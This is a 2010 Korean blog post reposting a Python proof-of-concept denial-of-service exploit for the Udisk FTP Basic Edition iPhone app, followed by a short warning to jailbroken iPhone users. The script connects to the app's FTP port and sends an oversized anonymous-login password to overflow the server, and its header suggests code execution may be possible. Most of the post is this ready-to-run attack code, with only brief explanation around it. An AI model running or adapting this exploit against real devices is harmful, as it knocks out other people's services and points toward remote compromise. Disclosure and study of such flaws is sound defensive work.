본문 바로가기
취약점소식

Apple Iphone/Ipod - Udisk FTP Basic Edition Remote 0day DoS Exploit

by 잡다한 처리 2010. 1. 13.
반응형



드디어 iPhone의 Exploit이 나오기 시작했다.

내가 iPhone을 사용하지 않기 때문에 정확하게 어떤내용인지는 모르겠지만, Udisk FTP Basic Edition 이라는 어플을 사용 할 시 
존재 하는 Exploit으로 판단된다.




Udisk FTP Basic Edition는 iPhone을 FTP 서버로 사용 하게 도와주는 어플리케이션으로 판단되며,
FTP 서버에 anonymous라는 ID와 0x41(2047개)라는 Password로 접속해서 Buffer Overflow를 노리는 것으로 보인다.

이를 이용하여 해커는 iPhone FTP서버에 있는 내용들을 가져 갈 수 도 있지 않을까 추측해본다.

이번 Udisk FTP Basic Edition 어플리케이션 0-Day의 Exploit POC 코드는 다음과 같다.
#!/usr/bin/python
#
# Apple Iphone/Ipod - Udisk FTP Basic Edition Remote 0day DOS exploit
# Found by: Steven Seeley (mr_me) seeleymagic [at] hotmail [dot] com
# Homepage: http://6tags.com/n/
# Price: $4.99
# Download: From the app store (use your itunes account)
# Tested on: Iphone 3G - firmware 3.1.2 (Darwin kernel)
# Greetz to: Corelan Security Team::corelanc0d3r/ekse/EdiStrosar/Rick2600/MarkoT/
# Advisory: http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-003-u-disk-ftp-pre-auth-remote-dos/
#
# Note: This **could** be remotley exploitable with code execution.
# I have not reversed this app..
 
print" |------------------------------------------------------------------|"
print" |                         __               __                      |"
print" |   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print" |  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |"
print" | / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print" | \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |"
print" |                                                                  |"
print" |                                       http://www.corelan.be:8800 |"
print" |                                              security@corelan.be |"
print" |                                                                  |"
print" |-------------------------------------------------[ EIP Hunters ]--|"
 
print "[+] Apple Iphone/Ipod - Udisk FTP basic edition Remote DOS exploit"
import socket
import sys
 
def Usage():
    print ("Usage:  ./udisk.py <serv_ip>\n")
    print ("Example:./udisk.py 192.168.2.3\n")
if len(sys.argv) <> 2:
        Usage()
        sys.exit(1)
else:
    hostname = sys.argv[1]
    username = "anonymous"
    passwd = "\x41" * 2047
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, 8080))
    print "[+] Connecting to the target.."
    except:
        print ("[-] Connection error!")
        sys.exit(1)
    r=sock.recv(1024)
    print "[+] Sending payload.. ph33r"
    sock.send("USER %s\r\n" %username)
    sock.send("PASS %s\r\n" %passwd)
    sock.send("PWD\r\n")
    sock.close()
    print "[+] Server is now DOS'ed!"
    sys.exit(0);

- 참고사항
소문에 들리길 iPhone 해킹(애플리케이션을 사용하기 위해 프로그램을 수정하는 작업)을 하게 되면 iPhone이 가지고 있던 보안관련을 모두 무시 한다고 들었다.
이 때문에 해킹을 하여 사용하는 모든 iPhone 사용자의 주의가 필요할 듯 하다.
특히, 사람이 많은 곳에서의 인터넷!! 조심하자!!
누군가가 당신의 iPhone을 노리고 있을 지도...

댓글